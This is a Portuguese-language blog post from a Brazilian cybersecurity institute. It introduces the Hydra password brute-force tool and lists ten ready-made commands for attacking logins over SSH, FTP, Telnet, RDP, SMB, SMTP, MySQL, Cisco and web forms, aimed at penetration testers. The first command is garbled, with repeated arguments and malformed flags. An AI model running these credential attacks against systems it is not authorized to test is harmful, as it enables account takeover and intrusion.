BLOG IBSEC

Imagem com uma série de números binários (0s e 1s) dispostos em colunas verticais, representando um tema de tecnologia e segurança da informação. No canto inferior esquerdo, está o logo do Instituto Brasileiro de Cibersegurança (IBSEC). O fundo da imagem é predominantemente azul, com efeitos de luz que criam uma atmosfera de tecnologia digital.

Hydra é uma ferramenta de força bruta que ajuda testadores de penetração e hackers éticos a quebrar senhas de serviços de rede.

Hydra pode executar ataques rápidos de dicionário contra mais de 50 protocolos. Isso inclui telnet, FTP, HTTP, HTTPS, SMB, bancos de dados e vários outros serviços.

Hydra foi desenvolvido pelo grupo de hackers “The Hacker’s Choice”. E foi lançado pela primeira vez em 2000 como uma ferramenta de prova de conceito que demonstrou como você pode executar ataques em serviços de logon de rede.

Hydra também é um cracker de login paralelizado. Isso significa que você pode ter mais de uma conexão em paralelo. Ao contrário do forçamento bruto sequencial, isso reduz o tempo necessário para quebrar uma senha.

Neste artigo, veremos 10 comandos para testes de invasão (credenciais) Hydra que todo profissional da área deve conhecer.

10 Comandos para Testes de Invasão (Credenciais) Hydra

  1. HTTP POST Form – Este comando tenta encontrar senhas para um formulário de login na web que usa o método POST >> hydra -l user-p passlist.txt mywebsite.com http-post-form http-post-form http-post-form “/login:username=^USER^&password=^PASS^:F=incorrect” – V
  1. SSH – Este comando tenta descobrir a senha de um usuário (neste caso, o usuário root) em um serviço SSH >> hydra -l root -P passlist.txt ssh://192.168.0.1
  1. FTP – Semelhante ao comando SSH, este comando busca descobrir a senha de um usuário em um servidor FTP >> hydra -l user -P passlist.txt ftp://192.168.0.1
  1. Telnet – Este comando usa listas de nomes de usuários e senhas. >> hydra -L userlist.txt -P passlist.txt telnet://192.168.0.1
  1. Windows Remote Desktop (RDP) – Este comando é usado para encontrar a senha do usuário ‘administrator’ para um serviço de Desktop Remoto do Windows >> hydra -t 1 – V -f -l administrator -P passlist.txt rdp://192.168.0.1
  1. SMB – hydra -l administrator -P passlist.txt smb://192.168.0.1
  1. E-mail (SMTP) – hydra -P passlist.txt -l [email protected] smtp://smtp.example.com
  1. Database (MySQL) – hydra -l root -P passlist.txt mysql://192.168.0.1
  1. Cisco Auth – hydra -P passlist.txt -v -f 192.168.0.1 cisco -t 4
  1. HTTP GET – Este comando é usado para tentar acessar uma área restrita de um site >> hydra -L userlist.txt -P passlist.txt mywebsite.com http-get /admin

Orientações Gerais

Confira também:  10 Ferramentas Pentest para Cibersegurança

Gostou do conteúdo? Se você deseja aprofundar mais seu conhecimento sobre testes de invasão, confira o Curso Pentest Avançado na Prática da IBSEC.

Rua Conceição de Monte Alegre, 107 - Bloco B
10º andar, Brooklin - São Paulo, SP - Brasil | CEP: 04563-060

contato @ ibsec.com.br

© 2024 Por IBSEC - Instituto Brasileiro de Cibersegurança | CNPJ: 07.697.729/0001-08

Todos os diretos reservados. | Termos | Privacidade